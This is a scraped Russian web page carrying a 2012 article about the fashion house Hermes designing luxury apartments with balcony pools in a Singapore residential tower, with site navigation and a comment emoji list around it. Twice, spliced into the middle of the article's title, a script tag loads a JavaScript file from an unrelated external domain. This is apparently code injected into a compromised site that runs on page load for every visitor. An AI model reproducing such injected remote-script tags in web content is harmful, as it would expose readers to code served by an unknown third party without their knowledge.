Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Дизайн квартир для дорогой недвижимости от модного дома Hermes

Дизайн квартир для дорогой недвижимости от модного дома Hermes

22 июн 2012, 09:20    ismirnov
0 комментариев    15 028 просмотров

Квартирный вопрос был и всегда будет актуальным во все времена. Лучше всего, конечно, приобретать новое жильё. Квартира в новостройке – мечта многих людей. Ведь жильё, построенное только что, несёт в себе новые технологии, свежий дизайн и модные тенденции.

 Дизайн квартир <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для дорогой недвижимости от модного дома Hermes

Свой вариант видения стильного жилья представил недавно знаменитый французский модный бренд Hermes.

 

Люксовые апартаменты, к которым «приложила руку» модная компания, расположены в огромном жилом комплексе The Signature Tower. Сам жилой комплекс находится на улице Paterson Hill, недалеко от бульвара Orchard Road, в здании с названием Marq on Paterson Hill, принадлежащем компании SC Global Developments.

 

Сооружение Marq – это две рядом стоящие 24-этажные башни с названиями: «Signature Tower» и «Premier Tower». Здания вместили в себя 66 стандартных апартаментов. Кроме этого в высотке «Premier Tower» размещены три пентхауса, площадь каждого из которых больше 1000 кв м. А в башне «Signature Tower» в каждой квартире есть свой бассейн. Вот в этом-то доме с бассейнами и работали дизайнеры от модного бренда Hermes, которыми было оформлено пять квартир. Каждая из квартир, в которой находятся пять спален, имеет площадь почти 580 квадратных метров.

 

Дом, где работала команда «Гермес», был высоко оценён ценителями роскоши, тем самым дизайнерский бренд доказал, что его деятельность может распространяться далеко за пределы модного мира.

 

Утончённый декор luxury-апартаментов никого не оставит равнодушным.

Роскошные квартиры отделаны материалами только самого безукоризненного качества, среди которых самые дорогостоящие виды кожи, роскошные ткани, прикроватные коврики и ковры из натуральной шерсти, изысканные обои, стильная посуда и столовые приборы. Люксовый дизайн квартир дополняют предметы искусства, с утончённым вкусом подобранные дизайнерами модного дома. Каждый жилой номер дизайнерская группа Hermes обставила особенной мебелью, спроектированной специально для этого проекта. Одним словом, Hermes и здесь сохранил свой имидж высочайшего уровня.

 

В каждой квартире комплекса есть бассейн-инфинити, расположенный на балконе, из которого открывается превосходный вид современного Сингапура. Стоит заметить, что бассейны на балконах и террасах не только в Сингапуре, но и по всему миру становятся популярным направлением в дизайне.

 

Дизайн квартир <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для дорогой недвижимости от модного дома HermesЧтобы создать стильные апартаменты дизайнерам от Hermes потребовалось почти полтора года.

 

Бренд Hermes впервые занимается таким проектом. И, исходя из того, что «первый блин» получился, совсем даже, «не комом», компания не намерена останавливаться на этом. Профессионалы модных аксессуаров и одежды планируют продолжать предоставлять свои услуги по квалифицированному дизайну квартир.

 

Нужно добавить, что модные бренды всё чаще стали прорабатывать интерьеры роскошных квартир. Среди бизнесменов, занимающихся недвижимостью, стало уже считаться хорошим тоном прибегать к услугам дизайнеров знаменитых домов моды. Уже известны всем гостиницы с номерами от домов Bottega Veneta в Park Hyatt в Чикаго, роскошные апартаменты от Versace в "Milano Residences" на Филлиппинах. А теперь и дом моды Hermes решил попробовать свои силы в новом амплуа - в бизнесе элитной недвижимости.

 

Компания Hermes уже 170 лет создаёт модные кожаные изделия, одежду прет-а-порте, косметику и украшения. Hermes - это известные всем платки-каре, сумки Birkin Bag, ремни с графическим знаком «H» на пряжке, а также подарочные оранжевые коробочки с шелковыми лентами коричневого цвета. Доходы империи «Гермес», владения которой укрепились в 35 странах планеты, превышают $1,5 миллиарда. Бизнес знаменитого модного дома  - это пример одного из самых удачных семейных предприятий.

 

Хозяева жилого комплекса The Signature Tower не будут продавать эти уникальные жилые помещения, а будут сдавать в аренду. Предполагается, что в этих люксовых гнёздышках будут проводить свои медовые месяцы молодожёны или просто влюбленные пары. Также высококлассные и стильные номера вполне подойдут для проведения здесь романтических уикендов.

Читайте также
02 ноя 2013, 08:58    0 комментариев
При создании этой туалетной принадлежности использовалось желтое золото в 22 карата. Причем, если раскуривая табак в золотой...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent